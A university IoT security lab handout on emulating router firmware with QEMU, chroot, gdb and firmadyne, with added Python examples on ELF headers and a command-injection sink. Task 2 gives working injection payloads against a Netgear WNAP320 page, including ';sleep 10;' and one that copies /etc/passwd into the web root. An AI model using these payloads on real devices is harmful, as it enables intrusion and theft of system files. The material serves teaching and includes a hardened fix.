IoT Security Workshop 2: Firmware Emulation

University of Wolverhampton
School of Mathematics and Computer Science

Student Number:
Name:

IoT Security Workshop 2

Lab Description

In this lab we will have a look at firmware emulation using different tools: QEMU (user-mode emulation), chroot and the Firmware Analysis Toolkit. Firmware emulation is extremely useful because it lets us, as security researchers, perform preliminary analysis without having the physical device. Complete Workshop 1 before attempting this one. Steps marked with (*) are explained in the previous workshop.

Task 1, learn how to emulate a firmware:

Power on your virtual machine and open a new terminal window.
(*) Enter the folder ~/Labs/Firmware
(*) Extract the firmware tew-emu.zip into tew-emu.extracted
(*) Enter the directory which contains the firmware (TEW-812DRUv2)

What is the processor architecture this firmware is supposed to run on? (*) [MARKS]
_______________________________________________________________________________________
_______________________________________________________________________________________

Do you think you can execute the command ./bin/busybox (or any other binary of this firmware) in your VM? Why? [MARKS]
_______________________________________________________________________________________
_______________________________________________________________________________________

Copy the file qemu-arm-static into the current directory (after chroot only files below the firmware's root are visible, so the emulator has to live inside it):
    cp /usr/bin/qemu-arm-static .
Make the file executable:
    chmod +x qemu-arm-static
Emulate the binary busybox (the sudo password is attify123), replacing <student number> with your real student number:
    sudo chroot . ./qemu-arm-static ./bin/busybox echo <student number>
Paste a screenshot to prove that the program is working. [MARKS]

Analyse the previous command: what do you think it does?
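The architecture question and the chroot command above are two sides of the same fact: the firmware's binaries are compiled for another CPU, so the VM's kernel cannot execute them directly; qemu-arm-static is a user-mode emulator that translates the ARM instructions, and chroot makes the firmware's own libraries and /bin appear at / while it runs. The Python script below is an added example and not part of the handout or of any tool used in it. It reads the same ELF header fields that the file command reports, says whether a binary would run natively on a given host, and names the qemu-user-static binary to copy into the root filesystem. The sample headers at the bottom are constructed for the example (32-bit little-endian ARM, 32-bit big-endian MIPS, 64-bit x86), not bytes read from the lab's firmware.

```python
import platform
import struct
from typing import Optional

# e_machine values from the ELF specification for the CPUs most often found
# in router firmware, plus the usual host CPUs.
EM_NAMES = {
    0x03: "x86",
    0x08: "MIPS",
    0x28: "ARM",
    0x3E: "x86-64",
    0xB7: "AArch64",
}

# platform.machine() strings mapped onto the same names so that the host
# and the binary can be compared.
HOST_NAMES = {
    "x86_64": "x86-64", "AMD64": "x86-64", "i386": "x86", "i686": "x86",
    "aarch64": "AArch64", "arm64": "AArch64",
    "armv6l": "ARM", "armv7l": "ARM", "mips": "MIPS",
}

# qemu-user-static binary per (machine, bits, endianness), as shipped by the
# qemu-user-static package.
QEMU_USER = {
    ("ARM", 32, "little"): "qemu-arm-static",
    ("ARM", 32, "big"): "qemu-armeb-static",
    ("AArch64", 64, "little"): "qemu-aarch64-static",
    ("MIPS", 32, "big"): "qemu-mips-static",
    ("MIPS", 32, "little"): "qemu-mipsel-static",
    ("MIPS", 64, "big"): "qemu-mips64-static",
    ("MIPS", 64, "little"): "qemu-mips64el-static",
    ("x86", 32, "little"): "qemu-i386-static",
    ("x86-64", 64, "little"): "qemu-x86_64-static",
}


def parse_elf_header(data: bytes) -> dict:
    """Decode the part of the ELF header that decides where a binary can run.

    e_ident[16] holds the magic, EI_CLASS (1 = 32-bit, 2 = 64-bit) and
    EI_DATA (1 = little-endian, 2 = big-endian); e_type and e_machine follow
    as two 16-bit fields stored in the file's own byte order.
    """
    if len(data) < 20 or data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    ei_class, ei_data = data[4], data[5]
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        raise ValueError("unsupported EI_CLASS/EI_DATA")
    endian = "<" if ei_data == 1 else ">"
    e_type, e_machine = struct.unpack(endian + "HH", data[16:20])
    return {
        "bits": 32 if ei_class == 1 else 64,
        "endian": "little" if ei_data == 1 else "big",
        "machine": EM_NAMES.get(e_machine, f"unknown(0x{e_machine:x})"),
        "type": {2: "EXEC", 3: "DYN"}.get(e_type, f"type{e_type}"),
    }


def inspect_file(path: str) -> dict:
    """Same check on a real file, e.g. inspect_file("bin/busybox") inside the
    extracted TEW-812DRUv2 directory."""
    with open(path, "rb") as f:
        return parse_elf_header(f.read(64))


def runs_natively(info: dict, host_machine: Optional[str] = None) -> bool:
    """True only when the binary's machine matches the host CPU; the lab VM is
    x86-64, so an ARM busybox cannot be executed directly."""
    host = HOST_NAMES.get(host_machine or platform.machine())
    return host is not None and host == info["machine"]


def qemu_user_binary(info: dict) -> str:
    """Which user-mode emulator to copy next to the firmware's bin/ before chroot."""
    key = (info["machine"], info["bits"], info["endian"])
    if key not in QEMU_USER:
        raise ValueError(f"no qemu-user-static binary known for {key}")
    return QEMU_USER[key]


def make_header(ei_class: int, ei_data: int, e_machine: int, e_type: int = 2) -> bytes:
    """Build a minimal ELF header (constructed sample data for this example only)."""
    endian = "<" if ei_data == 1 else ">"
    ident = b"\x7fELF" + bytes([ei_class, ei_data, 1, 0]) + b"\x00" * 8
    size = 52 if ei_class == 1 else 64  # sizeof(Elf32_Ehdr) / sizeof(Elf64_Ehdr)
    return (ident + struct.pack(endian + "HHI", e_type, e_machine, 1)).ljust(size, b"\x00")


# Constructed samples: a 32-bit little-endian ARM executable (the case the lab's
# qemu-arm-static handles), a 32-bit big-endian MIPS one and an x86-64 shared object.
ARM_LE_32 = make_header(1, 1, 0x28)
MIPS_BE_32 = make_header(1, 2, 0x08)
X86_64 = make_header(2, 1, 0x3E, e_type=3)

if __name__ == "__main__":
    for name, hdr in (("arm", ARM_LE_32), ("mips", MIPS_BE_32), ("x86-64", X86_64)):
        info = parse_elf_header(hdr)
        print(name, info, "native on this host:", runs_natively(info), "->", qemu_user_binary(info))
```

Run inspect_file("bin/busybox") from the TEW-812DRUv2 directory and compare the result with what file reports; runs_natively() gives the answer to the second question, and qemu_user_binary() explains why the handout copies qemu-arm-static and not, say, qemu-mips-static.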
Search on the web if you are not sure what chroot and qemu-arm-static do. [MARKS]
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________

Now use the option -g: qemu starts the program under its built-in gdb stub and waits for a debugger to connect on port 1234 before running it:
    sudo chroot . ./qemu-arm-static -g 1234 ./bin/busybox
Leave the program running and do not close this terminal window.
Open another terminal window and return to the firmware's directory (TEW-812DRUv2). Start the debugger with
    gdb-multiarch ./bin/busybox
After a few lines your new prompt should be (gdb). Change the architecture in the debugger by typing
    set architecture arm
Attach the debugger to the other process (busybox running in the other window):
    target remote localhost:1234
Set a breakpoint on write and continue the execution:
    b write
    c
When the breakpoint hits, show the string that register R1 points to. Under the ARM calling convention the arguments of write(fd, buf, count) are passed in r0, r1 and r2, so r1 is the buffer about to be printed:
    x/s $r1
What is the value of register R1? [MARKS]
_______________________________________________________________________________________
_______________________________________________________________________________________

Change the string R1 points to (the double quotes are mandatory) and hit c to continue:
    set $r1="your name and student id"
    c
Note that write() takes its byte count from r2, which you have not changed, so only as many bytes of the new string as the original string had will be printed; set $r2 to the new length as well if you want the whole string to appear.
Paste a screenshot of your output (in the original window). [MARKS]
Type quit in the debugger and press y to kill the target application. Type exit in both windows to close them.

Task 2, using the Firmware Analysis Toolkit (firmadyne):

Open a new terminal window.
(*) Enter the firmadyne folder:
    cd tools/firmadyne
What is firmadyne? Search on Google and answer. [MARKS]
_______________________________________________________________________________________
_______________________________________________________________________________________

Copy the firmware we want into the current directory:
    cp ../../Labs/Firmware/wnap320.zip .
Start the emulation by typing
    ./fat.py
It will ask for:
- the name of the firmware (enter wnap320.zip)
- the brand (enter Netgear)
- the password of firmadyne, if asked (enter firmadyne; if you make an error you need to start again from the beginning)
- the password of the user oit, if asked (enter attify123)
Wait 60 seconds and the emulation will be complete. Do not press any key or the emulation will be stopped.
Write here the IP address that appeared in the console (for example 192.168.0.100): _______________________________________________________________
Open the web browser and connect to that IP address. You should be able to see the web admin page. You are successfully running the firmware even without the device!

Minimise the browser and open a new terminal window (DO NOT close the existing command window, so that the emulation keeps running). Enter the firmware directory which you already extracted during Workshop 1:
    cd Labs/Firmware/wnap320.extracted
    cd _rootfs.squashfs.extracted
    cd squashfs-root
Now open the file home/www/boardDataWW.php:
    nano home/www/boardDataWW.php
The line starting with exec("…") is a vulnerability called COMMAND INJECTION. Search on the internet and try to describe how it works. [MARKS]
_______________________________________________________________________________________
_______________________________________________________________________________________

In our specific case, the firmware executes a shell command (wr_mfg_data) by concatenating a variable (macAddress) that comes from the user. Whatever the user types becomes part of the command line handed to the shell, so a shell metacharacter such as ; ends the wr_mfg_data command and starts a second one of the attacker's choosing. That is the vulnerability we are going to exploit. Close the editor by pressing CTRL+X.
To exploit this vulnerability we need to point the browser at an intercepting proxy. Re-open the browser, go to Preferences, then Advanced, and select the Network tab. Click Settings and set the HTTP proxy to 127.0.0.1:8080 as in the picture. Press OK/Apply to close the dialogs.
In the terminal, go to the tools directory and run Burp Suite:
    cd ~/tools
    java -jar burpsuite_community_v1.7.35.jar
If the software wants to update itself, choose Close. Check "Temporary project" and press Next. Check "Use Burp defaults" and press Start Burp.
Return to the web page and open the URL /boardDataWW.php on the firmware's IP address. The page will remain in the "connecting" state because Burp Suite is intercepting (and holding) the request. We need to forward it by opening Burp Suite, clicking on Proxy, then Intercept and finally Forward. At this point the browser will receive the new page.
Now insert a fake MAC, for example 123456789012, and press Submit. As soon as you press Submit, Burp Suite will again capture the requests (you can see them in the HTTP history tab). Choose the POST request (it should be the last one), right-click on it and select "Send to Repeater", which lets us resend the same request with updated parameters.
Click on the Repeater section. Pressing the "Go" button sends the same request to the server. Try it.
Modify the parameter from
    macAddress=123456789012&reginfo=0&writeData=Submit
to
    macAddress=123456789012;sleep 10;&reginfo=0&writeData=Submit
and press Go. How many seconds does the server take to answer? What is happening? [MARKS]
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________

Now that we know the server is vulnerable, we can ask for more interesting stuff. First, let's copy the file /etc/passwd into the web directory using the following parameter (the . is the working directory of the process running the PHP script, which here is the directory the pages are served from):
    macAddress=123456789012;cp /etc/passwd .;&reginfo=0&writeData=Submit
Now we can ask the web server for that file by changing the URL in the browser to /passwd. Press Forward in Burp Suite to allow the request.
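Both payloads above, and the exec("…") line described in the previous section, work for the same reason: the script concatenates macAddress into a command line and hands it to /bin/sh, so ; terminates the wr_mfg_data command and everything after it runs as a second command with the web server's privileges. The script below is an added example, not code from the lab or from the firmware. It models that sink in Python, shows why a ;sleep N; payload is the usual first test (the delay is measurable even when the command's output never reaches the page), shows what the Repeater form body looks like once URL-encoded, and puts a fixed version next to the vulnerable one. wr_mfg_data does not exist outside the device, so echo stands in for it (an assumption of the example, marked in the code); the MAC and payload strings are the ones used in the lab.

```python
import re
import subprocess
import time
from typing import Callable
from urllib.parse import urlencode

# Stand-in for the firmware's wr_mfg_data binary (assumption for this example:
# any program will do, because the injection happens before it is even started).
STANDIN_BINARY = "echo"


def vulnerable_exec(mac: str) -> str:
    """Model of the boardDataWW.php sink: the user-supplied value is concatenated
    into a command line and given to /bin/sh, which is what PHP's exec() does."""
    cmd = f"{STANDIN_BINARY} -m {mac}"
    done = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return done.stdout + done.stderr


def is_valid_mac(mac: str) -> bool:
    """Allow-list: exactly 12 hex digits, nothing the shell could interpret."""
    return re.fullmatch(r"[0-9A-Fa-f]{12}", mac) is not None


def hardened_exec(mac: str) -> str:
    """Fixed version: validate against the allow-list, then run the program with
    an argument vector so no shell ever parses the value."""
    if not is_valid_mac(mac):
        raise ValueError("macAddress must be exactly 12 hex digits")
    done = subprocess.run([STANDIN_BINARY, "-m", mac], capture_output=True, text=True)
    return done.stdout


def form_body(mac: str) -> str:
    """application/x-www-form-urlencoded body for the boardDataWW.php form.
    Burp Repeater sends ; and spaces raw when you type them; urlencode() percent-
    encodes them instead. The server decodes both to the same $_POST value."""
    return urlencode({"macAddress": mac, "reginfo": "0", "writeData": "Submit"})


def sleep_payload(mac: str, seconds: int) -> str:
    """The lab's time-based probe: ';sleep N;' appended to an otherwise valid value."""
    return f"{mac};sleep {seconds};"


def time_probe(sink: Callable[[str], str], mac: str, seconds: int) -> float:
    """Seconds the sink takes with the sleep payload. A delay of about N seconds
    means the shell executed our command; the hardened sink rejects it at once."""
    start = time.monotonic()
    try:
        sink(sleep_payload(mac, seconds))
    except ValueError:
        pass
    return time.monotonic() - start


def injected_output(sink: Callable[[str], str], mac: str, command: str) -> str:
    """Run ';<command>' through the sink and return whatever it produced
    (empty when the sink blocks the payload). 'cp /etc/passwd .' is the lab's
    variant of this, with the output collected through the web root instead."""
    try:
        return sink(f"{mac};{command}")
    except ValueError:
        return ""


if __name__ == "__main__":
    mac = "123456789012"
    print(form_body(sleep_payload(mac, 10)))
    print("vulnerable sink:", round(time_probe(vulnerable_exec, mac, 2), 1), "s")
    print("hardened sink:  ", round(time_probe(hardened_exec, mac, 2), 1), "s")
    print(injected_output(vulnerable_exec, mac, "id"))
```

The allow-list plus argument-vector pattern in hardened_exec() is the fix to look for when you review the real PHP: escaping individual characters is fragile, whereas a strict format check followed by a call that never involves a shell leaves nothing for ; to terminate.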
You should get the file in the response section.

Task 3, about firmware analysis:

Before moving on to other workshops covering other elements of the IoT, I ask you to write your thoughts: why do you think firmware is important from a security point of view? Did you find the introduction to how to analyse it interesting? Why?
_____________________________________________________________________
_____________________________________________________________________
_____________________________________________________________________
_____________________________________________________________________
_____________________________________________________________________
_____________________________________________________________________